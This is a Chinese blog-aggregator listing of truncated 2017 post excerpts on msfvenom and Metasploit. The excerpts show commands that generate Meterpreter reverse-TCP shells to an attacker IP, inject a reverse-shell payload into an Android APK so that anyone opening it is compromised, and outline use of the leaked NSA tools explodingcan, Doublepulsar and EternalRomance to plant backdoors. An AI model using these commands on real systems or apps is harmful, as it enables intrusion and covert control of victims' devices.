一、使用msfvenom生成PS1文件: 二、开启msf监听: 二、在目标机器执行cmd命令: 注意区分目标及系统是32位还是64位。 ...
分类:
Web程序 时间:
2017-07-04 20:09:44
阅读次数:
2939
使用NSA工具包针对iis 6.0 webDAV漏洞的工具(explodingcan)工具的使用就不说了,直接默认选下一直往下,修改下图中的几个地方: 这里输入本机(运行NSA工具包的电脑)外网ip 这里的CallbackIP随意 成功下一步使用msfvenom生成一个反弹dll:命令为:msfve ...
分类:
其他好文 时间:
2017-06-24 18:41:28
阅读次数:
303
我们的攻击机IP是192.168.222.133 目标机IP是192.168.222.132 我们首先生成一个powershell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f p ...
分类:
其他好文 时间:
2017-06-18 13:23:06
阅读次数:
1135
命令:msfvenom -x /路径/apk -p android/meterpreter/reverse_tcp LHOST=ip LPORT=端口 只要别人一打开这个被注入payload后的软件就可以获得meterpreter 当然你要启动msfconsole监听 msfconsole hale ...
分类:
其他好文 时间:
2017-06-11 21:11:01
阅读次数:
305
首先安装apt-get install apkinjector 这个东西,msfvenom重新组装apk的时候会自动调用 msfvenom -x /路径/apk android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<端口> -o /存放路径/注入成功的a ...
分类:
其他好文 时间:
2017-06-07 17:30:45
阅读次数:
223
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with ...
分类:
其他好文 时间:
2017-05-20 13:16:14
阅读次数:
426
MSFVENOM常规选项 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -p ...
分类:
其他好文 时间:
2017-05-10 19:57:14
阅读次数:
614
先使用Smbtouch模块检测一下是否有漏洞。 然后使用Doublepulsar写一个shellcode到本地。 生成成功后的截图: 再使用EternalRomance植入Doublepulsar后门。 成功的截图: PS:仿佛是由于之前已经上传过bin的缘故,第二次测试的时候失败了。但是不影响后续 ...
分类:
其他好文 时间:
2017-04-29 23:28:23
阅读次数:
999
原文链接:MSFvenom 1、使用MSFvenom命令行界面 msfvenom是Msfpayload和Msfencode的组合,将这两个工具集成在一个框架实例中。 msfvenom的优点是: 一个单一的工具 标准化的命令行选项 速度提升 Msfvenom有多种选项可供使用: 2、MSFvenom命 ...
分类:
其他好文 时间:
2017-04-28 11:18:58
阅读次数:
565
又回到了那个不想打游戏不想聊天不想说话的日子。 不用想。vm——>kali 很早以前看过用msfvenom生成木马的文章。然后……然后我的浏览器就崩溃了。Firefox。只好用回edge。 然后。。看到了小时候的照片,从小到大。真的是不知不觉。18了就。 由于是在空间和博客同时发表。其实也没什么所谓 ...
分类:
其他好文 时间:
2017-04-13 23:34:26
阅读次数:
254